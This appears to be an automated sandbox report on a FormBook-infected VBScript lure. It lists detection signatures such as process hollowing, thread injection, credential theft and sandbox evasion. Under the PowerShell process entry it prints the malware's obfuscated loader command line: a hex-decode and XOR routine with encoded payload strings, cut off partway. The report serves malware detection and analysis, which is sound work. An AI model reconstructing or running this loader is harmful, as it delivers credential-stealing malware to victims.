Edit tour
Windows
Analysis Report
GlobalImagingDocuments9575734549684.vbs
Overview
General Information
Detection
FormBook
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Very long command line found
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard
Classification
- System is w10x64
- wscript.exe (PID: 6128 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Globa lImagingDo cuments957 5734549684 .vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 5496 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Vakanc = """NFFuSnL cKtPiOoPnC ECFrsoBuB pSiGeFrdsC rU0J2h T{S A W S HpM aUrWaTmK(M [SSbtBrriT nMgA]U`$LT SiTlWbRlUi tvC)B;P L` $MFMoUdLfU sStu P=M I `$ETMiSlMb ElFiRvT.SL PeRnCgRtLh R;S A s V N`$TSUkBab lflSeLtAeB fs P=U FNM ekwR-GOSbT jUefcAtT F bTyOtIeN[T ]D P(D`$UF woDdPfUsSt H C/u S2F) f;L M d S EFToKrS(S` $SdaeCpBeR npdCeZnasH =F0a;I B`$ BdGeSpreOn PdGeMnSsB P-KlBtM A` $PFFoKdafS sHtC;P U`$ SdIeUpFeMn fdOeEnFsI+ V=M2K)H{m a S u D`$C oYsPtTeAoE pUlRaA p=O A`$ITDiMl CbClBiOvB. GSTuGbBsSt TrPiKnUgB( M`$OdFeSpL ePnAdDeBnS sS,R S2F)A ;E D A U M `$PSAkLaOl SlPeMtSeEf A[C`$UdSeF pSePnOdSeM nHsV/V2A]V D=B T[CcA oSnBvIeArB tT]V:J:ITF oHBFybtkeC (R`$FoBsHt DeMoVpSlfa P,D B1L6R) P;K D L`$S SBkUaSlSlR eEtFeOfV[I `$RdPeSpLe PnZdkeCnPs D/T2A]R C= u D(H`$NSU kVaTlClVeF tMeNfU[U`$ DdUePpMeIn BdNeBnLsE/ P2I]O I-Pb mxToBrS s1 I0S2P)P;N O S U S}S R[PSTtPrDi EnTgB]u[ES AyRsAtBeBm m.STKeBxPt H.KEAnWcUo BdEiGnmgK] L:A:NAPSHC VIPIS.EGMe HtmSDttrEi CnVgL(S`$R SMkAaOlUlM eAtOeLfU)C ;S}PSPeEtP -HCVoBnDtU eFnHtB n'B EM:S\ECOrM oSuCpNiSeS rBsKrE0U3H 'A B'U2V'P ;S`$tDmeCp LrUaR V=G AGSePtn-GC SoGnGtYeFn LtS G'SEL: M\RCRrsoTu IpLiCeArts HrA0G3S'S; o`$RBEoUuK gN0T=PCgrH oLuApGiBeM rBsSrS0B2K T'H3A5P1O FA1F5E1P2b 0A3P0UBo4F 8M0L2B0wAB 0CAL'S;GiG fU A(s`$TD KeEpnrAaK H-QeLqk P' O2B'R)f R{ B`$uBcoNuC gE0W=M'S'M }F;P`$ABBo PuKgC1B=CC FrGoPuTpRi SeCrDsSrT0 R2V T'S2IB B0uFP0B5A1 G4B0M9N1A5 K0F9s0D0T1 F2H4k8V3S1 L0uFD0S8G5 v5N5G4S4T8 S3D3P0S8V1 S5m0T7S0A0 U0A3M2P8F0 B7O1N2H0RF w1J0T0P3j2 CBS0F3M1s2 H0SED0P9K0 O2F1B5P'F; D`$IBNofuL gM2G=MCTru oEuSpCiTeI rSsIrT0O2l S'M2G1S0s 3S1O2K3T6I 1O4L0K9R0F 5I2U7M0P2R 0B2C1F4G0F 3S1S5F1U5A 'L;h`$TBKo VusgM3E=SC SrDoFuOpNi KeRrSsKrS0 s2U X'A3M5 O1fFT1S5K1 D2F0A3o0SB W4H8D3D4U1 M3s0K8E1S2 A0VFL0HBI0 S3O4S8P2HF C0I8e1P2B0 F3R1W4S0T9 P1T6W3G5P0 E3F1D4S1B0 P0SFR0A5B0 B3T1O5U4G8 E2BEP0C7H0 B8S0C2b0CA H0n3B3F4T0 Z3S0a0F'A; D`$ABNoQuM gT4H=CCDrB oDuSpPiCeT rZsHrD0M2t T'm1T5I1O 2V1D4u0EFC 0e8U0G1W'R ;H`$SBPoKu Lgc5s=GCur UoEuRpTiSe NrbsLrF0A2 P P'R2O1T0 O3U1S2D2TB V0P9H0U2F1 C3B0nAG0N3 S2KEE0L7B0 O8S0F2V0uA R0W3D'U;S` $FBPoSuDgO 6F=PCSrSoS uApTiSeTre sSrT0h2S T 'T3S4F3P2H 3U5T1n6u0l 3B0I5A0SFI 0K7H0FAT2L 8N0S7A0FBs 0n3m4DAA4T 6U2ZED0AFI 0W2P0K3R2E 4T1SFF3I5V 0TFM0A1P4T AS4G6B3C6S 1L3O0r4H0M AE0BFU0M5A 'A;C`$SBIo TukgR7S=CC GrAoFufpCi UeCrUsUrB0 E2W F'A3A4 P1K3P0I8O1 U2S0OFM0TB P0K3S4HAA4 T6L2UBP0S7 L0F8D0g7S0 T1L0Z3A0M2 E'S;P`$TBF oFuFgu8B=B CJrSoBuCpR iUePrPsTrM 0S2H T'K3C 4P0B3B0H0C 0CAB0F3P0T 5U1S2E0S3U 0U2M2H2P0C 3P0SAH0I3S 0U1K0T7P1P 2n0a3S'T;J `$GBSoLuFg M9V=ACerHo ruOpPiSeTr DsNrS0N2N A'm2aFF0P8 G2HBJ0S3A0 PBt0S9P1D4 A1FFF2PBS0 S9O0S2S1C3 t0DAf0S3B' D;R`$CSHpF rIgKeE0R=I CBrUoAuLpD